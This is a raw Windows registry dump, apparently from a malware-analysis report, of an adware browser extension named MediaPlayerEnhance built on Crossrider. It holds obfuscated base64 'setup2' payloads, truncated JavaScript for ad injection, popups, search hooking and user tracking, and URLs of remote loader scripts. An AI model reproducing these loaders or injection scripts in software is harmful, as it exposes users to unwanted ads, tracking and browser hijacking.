    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2Mzc5NDEwZDA0MTAwMzJmMTAxZjRiNGE0MzQ3MTgxMDA3MGE1ODVjNDYwMzE3MDQwNDBkMTA1NDAxMWExYzA2MGM0YjEzMGIxZTU1MGYxNjBkMTkwMjRhMDMwMDE4NTUxMjAxMDAxMzA2MTYwMDA1MDEwODBkMDQ0NDQxNGQ1MTVlMDkxYTE0NGMxOTFhNTI0ZjZmNzk0NjFiMGUxNjAzMWEyNTExMDk1MjVlNTM1ODBhMDcxZDAwMTA1ZjVmNGIwMDFmMDEwNjFiMTU0ZDA2MTkxMTA1MTU0YzEwMDYxZDRjMDgxNTAwMWExYjRkMDAwZDFiNGMxNTAyMGQxMDFmMTEwMzA4MDIxMTBhMDc0OTQyNTQ1NjVkMDQxOTBkNGIxYTE3NTE1NjY4N2E0YjAwMGYxMDE3MGQxZDMzMDY1MTUzNTA1MjVjNDE0ODc5NWE0MjUzNDk1MjE1MDAwMjEwMWExOTAzMWY0YjRhNDMzZTUyMTcxYjE1MTIwMzAwMWUwNDQ3MmQ0ODc5NWE0MjUzNDk1MjBhMGIxYzBkMWQxZjI4MjA0YjRhNDM0NzE5MDI1MzUyMTYwYTE5MTUwYzAzNTAxMzFhMTQwNjFjMWU1ZTNjMDYxOTExMDUxNTEyMDEwYzE2MTA0NTRkNTk0ZTVhNDUwNjA3MTQwNjAzMTkwYTE2MWU0NTVhNDkwNzBhMGIxNDBiMDQ1NDNkMTAwMDA1MTUwYTAwMTYxNjFjMTE1MzU0NTAxODE4NGI0NDUzMGQwYjFkMGQxZjE0NGIyZjA3MWEwZjE0MWMxOTAyMDYwMzAzNGEwMzA4MGIxMDBjMDMxMzA0MDIxNjFjMGQ0MjRlNDkwYjQ0MDYxMTA5MDMxYjBiMTQwNzU3NTk0NTU3MDcwMTE1MTEwMDFiMTkwNzAwMDIzYjJjMzkzMDNjM2EyMzMxMmMzNDIxMjEyNTMxMjYyYjJmMmEyMTJmM2I'"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "Name" = "base"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,E'"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cookies" = "%Documents and Settings%\%current user%\Cookies"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke'"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "Version" = "46"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\MPlayerplus_01\Plugins\183]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi.'"

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "Version" = "7"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "Version" = "11"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3YzdhNTEwZjBjMDMxNTJkMGEwNjU0NDk1MzQ1MTAwMzExMDg0MjQ1NTkxZDAzMTQ1NjE5MGEwODBhMDUxNDFmMTYwYTA4MDcwNjU2MWIwNTFiNWMxZDE3MGIxNTRhMTQxNzBkMWYxMDVkMGQwYjQ4MmEwYTExMGQxZjFkM2EwMzQ1MzI1ZDM5NGMyYjQ0NDAzMjRhM2E0NzU2NGM1NTJmNDQ0MjQyNGEzOTRlMjQ0ODU1NWE0NjQyNDY1NjRmMzM1NDQ4M2U1YzMzNTUyMDBlMGMxMjJjMWM0NTM5MTcxZjE2MTQ1ZTI3MDQwYTBjMDQxMzAxM2EyMzQ1NDU1NTQ4NDg1YTUwMjMwMTA4MWMwMjA2MGMzNjBiMWIxNjRlMzgyNzM0MzczNzJiMzkyNDNhMzcyMjJhMjgyNDI4MjgzNTM4MzIzZTIyMjcyODQzMmMxNzA1MWExMTEyMTUzMTEzNTgyNzI3MjkyNDNjMjAzNDJhM2UyMTNkMmEzNTI1MjYzMTM4MzEzMzNhMjc1YTQ2N2M3YTUxMGYwYzAzMTUwYjJkMTgxYTUxNDk0NzVhMWYxMTBjMDgxOTRjNWM1YzA5MDgwNDRiMTYxNzFhMDQxYzExMGIxZDFhMTUwODFiNDQxNTFjMWU0ODE2MDcxNjFhNTcwNjE5MTQxYTA0NTYxZDE2NDczNzE4MWYxNDFhMDkzMTEzNTgzZDQwMmI0MjMyNDE1NDM5NWEyNzQ4NGI1ZTViMzY0MTU2NDk1YTI0NDEzOTVhNWI0MzQzNTY0ZDQ2NTIzYzQ5NWEzMDQ1MzY0MTJiMWUxMTFkMzEwZTRiMjAxMjBiMWQwNDQzMjgxOTE4MDIxZDE2MTUzMTMzNTg0YTQ4NWE0NjQzNTUzNzBhMTgwMTBkMWIxZTM4MTIxZTAyNDUyODNhM2IyYTI1MjUyMDIxMmUzYzMyMzcyNzM5M2EyNjJjM2QyNjM1MzI'"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "homepageurl" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\MPlayerplus_01\Plugins\91]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/monetizationLoader.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "Name" = "IECallbacks"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "PluginsManifestVersion" = "27"

    [HKCU\Software\MPlayerplus_01\Installer]
    "srcid" = "001359"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});'"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "ModeType" = "production"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p7'"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU3YjZjNTMxZDExMTgxMzI1MWYwMjUzNWY1MTU3MGQxODE3MDA1NzQxNWUwYzFmMDYxMTQyMTAxODAyMWUwMTBjMWYxMjA0MTgwNjVlMDQwMDE3MGE1ZTFmMTY0MzEwMTczMjBjMTY0YjFiMDY1YTJkMjUzNjI0MjIzODI0MjUzMDNhMjUyNzRkMGUxYzAyMTcxNTA3NDMzZjM2MzIzMjJhMzgzNjI1MjcyYzJlMzYyNDI4M2MyZTJjMzU0ODNhMzMyMDIyMjIzZDIyMzczODMxMjAzZTNjMjMzODJjMmUyYzM1MmEzYTRhMjEyMjJjMjAzNTNhMzUzYzM2M2MyZjMxMzQzMTNmMjQzYzMwNTgzMzNjMzMzZjIxMjIzNjIzM2MyMTI5MzEyZjJjM2UyMTNhM2YzNDI4MjkzYzJmNGY0MjdiNmM1MzFkMTExODEzMDMzODFjMWQ0NzRiNTU0NzA0MTcwNDFkMWQ0YjRhNWUxYzBiMWYxNzVlMWUwNjFlMTUwMTFjMGIwYjAyMDQwODQwMTgwYjE3MWE0YTA2MTA1ZjFlMDkyZTA3MTY1YjBmMWY1YzMxMmIyODM4MjkzODM0MzEyOTNjMzkyOTUzMTIxNzAyMDcwMTFlNDUyMzM4MmMyZTIxMzgyNjMxM2UyYTMyMzgzYTM0MzcyZTNjMjE1MTNjMmYyZTNjM2UzNjIyMjcyYzI4MjYyMjMyM2QyNDI3MmUzYzIxMzMzYzU2MmYzYzMwMmIzNTJhMjEyNTMwMjAyMTJmMjgzYTNmMzQyODI5NWUyZjMyMmQyMzJhMjIyNjM3MjUyNzM1M2YzMTMwMzUyMTJhMmIyZDJlMzUzMjMxNTM0OTdiN2M0NzFjMGYwNTBhMDcxZjJjMTU1NzVmNGM1MTQ0NWY0MjdiNDU1MTU1NDU0ZTE1MTUxZjFhMTgwNjEwMTk0NzU2NDMyYjRmMWQxOTBhMDEwNTBjMDI'"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "Name" = "IEBackground"

    [HKCU\Software\MPlayerplus_01\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "87 41 CE 2B BB 4C A3 24 E4 2A CD 47 B6 97 AF AC"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[190] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(190, [pops])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\64]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\MPlayerplus_01\Plugins\9]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\MPlayerplus_01\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\MPlayerplus_01\Plugins\14]
    "Name" = "CrossriderUtils"

    [HKCU\Software\MPlayerplus_01\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "Version" = "10"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "Version" = "8"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\MPlayerplus_01\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "Name" = "IEMisc"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
    "Name" = "ciuvo_m"

    [HKCU\Software\MPlayerplus_01\Plugins\93]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

    [HKCU\Software\MPlayerplus_01\Plugins\191]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "Version" = "9"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars"

    [HKCU\Software\MPlayerplus_01\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "Name" = "resources"

    [HKCU\Software\MPlayerplus_01\Plugins\1]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"

    [HKCU\Software\MPlayerplus_01\Plugins\3]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\2]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[103] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(103, [intext])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "Version" = "33"

    [HKCU\Software\MPlayerplus_01\Installer]
    "DefaultBrowser" = "ie"

    [HKCU\Software\MPlayerplus_01\Plugins]
    "NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

    [HKCU\Software\MPlayerplus_01\Plugins\38]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Installer]
    "osName" = "XP32"

    [HKCU\Software\MPlayerplus_01\Plugins\242]
    "Version" = "3"

    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\MPlayerplus_01\Plugins\221]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

    [HKCU\Software\MPlayerplus_01\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "SetNewTab" = "false"
    "Manifest" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\MPlayerplus_01\Plugins\102]
    "Version" = "6"

    [HKCU\Software\MPlayerplus_01\Plugins\103]
    "Version" = "8"

    [HKCU\Software\MPlayerplus_01\Plugins\78]
    "Version" = "5"

    [HKCU\Software\MPlayerplus_01\Plugins\233]
    "Name" = "revizer_p_dynamic_b2b_2_m"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "PublisherName" = "Freeven"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\MPlayerplus_01\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\MPlayerplus_01\Plugins\226]
    "Name" = "set_campaign_id_m"

    [HKCU\Software\MPlayerplus_01\Installer]
    "StatsDomain" = "http://stats.clientstaticserv.com"

    [HKCU\Software\MPlayerplus_01\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\44]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\MPlayerplus_01\Installer]
    "FullVersionForUrl" = "1_34_05_12"

    [HKCU\Software\MPlayerplus_01\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\MPlayerplus_01\Plugins\7]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "Name" = "pops_5_m"

    [HKCU\Software\MPlayerplus_01\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\MPlayerplus_01\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b1'"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "Description" = "MediaPlayerEnhance Extension"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\MPlayerplus_01\Manifest]
    "DisableIe" = "true"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\MPlayerplus_01\Plugins\42]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"

    [HKCU\Software\MPlayerplus_01\Plugins\207]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\MPlayerplus_01\Plugins\177]
    "Version" = "2"

    [HKCU\Software\MPlayerplus_01\Plugins\22]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"

    [HKCU\Software\MPlayerplus_01\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\MPlayerplus_01\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "Version" = "25"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\MPlayerplus_01\Plugins\36]
    "Version" = "8"

    [HKCU\Software\MPlayerplus_01\Plugins\253]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/pixel_inject.js"

    [HKCU\Software\MPlayerplus_01\Plugins\45]
    "Version" = "4"

    [HKCU\Software\MPlayerplus_01\Plugins\43]
    "URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
    "Name" = "revizer_ws_dynamic_b2b_light_m"

    [HKCU\Software\MPlayerplus_01\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\MPlayerplus_01\Plugins\190]
    "Version" = "3"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\MPlayerplus_01\Plugins\211]
